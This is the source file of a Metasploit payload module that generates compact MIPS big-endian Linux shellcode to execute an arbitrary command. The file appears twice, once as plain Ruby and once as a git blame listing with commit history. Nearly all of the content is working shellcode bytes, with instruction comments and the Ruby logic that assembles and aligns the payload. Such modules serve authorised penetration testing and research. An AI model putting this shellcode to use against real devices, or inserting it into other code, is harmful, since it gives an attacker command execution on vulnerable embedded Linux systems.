modules/payloads/singles/linux/mipsbe/exec.rb

# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 52

  include Msf::Payload::Single

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Execute Command',
        'Description' => %q{
          A very small shellcode for executing commands.
          This module is sometimes helpful for testing purposes.
        },
        'Author' => [
          'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload
          'entropy@phiral.net' # original payload
        ],
        'References' => [
          ['EDB', '17940']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
    register_options(
      [
        OptString.new('CMD', [ true, 'The command string to execute' ]),
      ]
    )
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    return datastore['CMD'] || ''
  end

  def generate(_opts = {})
    shellcode =
      "\x24\x06\x06\x66" + # li a2,1638
      "\x04\xd0\xff\xff" + # bltzal a2,4100b4
      "\x28\x06\xff\xff" + # slti a2,zero,-1
      "\x27\xbd\xff\xe0" + # addiu sp,sp,-32
      "\x27\xe4\x10\x01" + # addiu a0,ra,4097
      "\x24\x84\xf0\x1f" + # addiu a0,a0,-4065
      "\xaf\xa4\xff\xe8" + # sw a0,-24(sp)
      "\xaf\xa0\xff\xec" + # sw zero,-20(sp)
      "\x27\xa5\xff\xe8" + # addiu a1,sp,-24
      "\x24\x02\x0f\xab" + # li v0,4011
      "\x01\x01\x01\x0c"   # syscall 0x40404

    #
    # Constructs the payload
    #

    shellcode = shellcode + command_string + "\x00"

    # we need to align our shellcode to 4 bytes
    shellcode += "\x00" while shellcode.bytesize % 4 != 0

    return super + shellcode
  end
end
Fix crashing mipsle modules 2024-05-21 12:52:12 +01:00			`# -- coding: binary --`

exec payload - new try 2014-03-26 19:48:14 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
exec payload - new try 2014-03-26 19:48:14 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
Instantiate payload modules so parameter validation occurs 2015-08-13 11:10:50 -05:00			`CachedSize = 52`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
exec payload - new try 2014-03-26 19:48:14 +01:00			`include Msf::Payload::Single`

			`def initialize(info = {})`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`super(`
			`merge_info(`
			`info,`
			`'Name' => 'Linux Execute Command',`
			`'Description' => %q{`
			`A very small shellcode for executing commands.`
			`This module is sometimes helpful for testing purposes.`
			`},`
			`'Author' => [`
			`'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload`
			`'entropy@phiral.net' # original payload`
exec payload - new try 2014-03-26 19:48:14 +01:00			`],`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`'References' => [`
feedback included 2014-03-27 16:12:34 +01:00			`['EDB', '17940']`
exec payload - new try 2014-03-26 19:48:14 +01:00			`],`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_MIPSBE,`
			`'Payload' => {`
			`'Offsets' => {},`
exec payload - new try 2014-03-26 19:48:14 +01:00			`'Payload' => ''`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`}`
			`)`
exec payload - new try 2014-03-26 19:48:14 +01:00			`)`
			`register_options(`
			`[`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`OptString.new('CMD', [ true, 'The command string to execute' ]),`
			`]`
			`)`
exec payload - new try 2014-03-26 19:48:14 +01:00			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
			`return datastore['CMD'] \|\| ''`
			`end`

Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
exec payload - new try 2014-03-26 19:48:14 +01:00			`shellcode =`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`"\x24\x06\x06\x66" + # li a2,1638`
			`"\x04\xd0\xff\xff" + # bltzal a2,4100b4`
			`"\x28\x06\xff\xff" + # slti a2,zero,-1`
			`"\x27\xbd\xff\xe0" + # addiu sp,sp,-32`
			`"\x27\xe4\x10\x01" + # addiu a0,ra,4097`
			`"\x24\x84\xf0\x1f" + # addiu a0,a0,-4065`
			`"\xaf\xa4\xff\xe8" + # sw a0,-24(sp)`
			`"\xaf\xa0\xff\xec" + # sw zero,-20(sp)`
			`"\x27\xa5\xff\xe8" + # addiu a1,sp,-24`
			`"\x24\x02\x0f\xab" + # li v0,4011`
			`"\x01\x01\x01\x0c" # syscall 0x40404`
exec payload - new try 2014-03-26 19:48:14 +01:00
			`#`
			`# Constructs the payload`
			`#`
MIPS exec payload fixes for encoder 2014-04-30 20:37:54 +02:00
			`shellcode = shellcode + command_string + "\x00"`

			`# we need to align our shellcode to 4 bytes`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`shellcode += "\x00" while shellcode.bytesize % 4 != 0`
MIPS exec payload fixes for encoder 2014-04-30 20:37:54 +02:00
			`return super + shellcode`
exec payload - new try 2014-03-26 19:48:14 +01:00			`end`
			`end`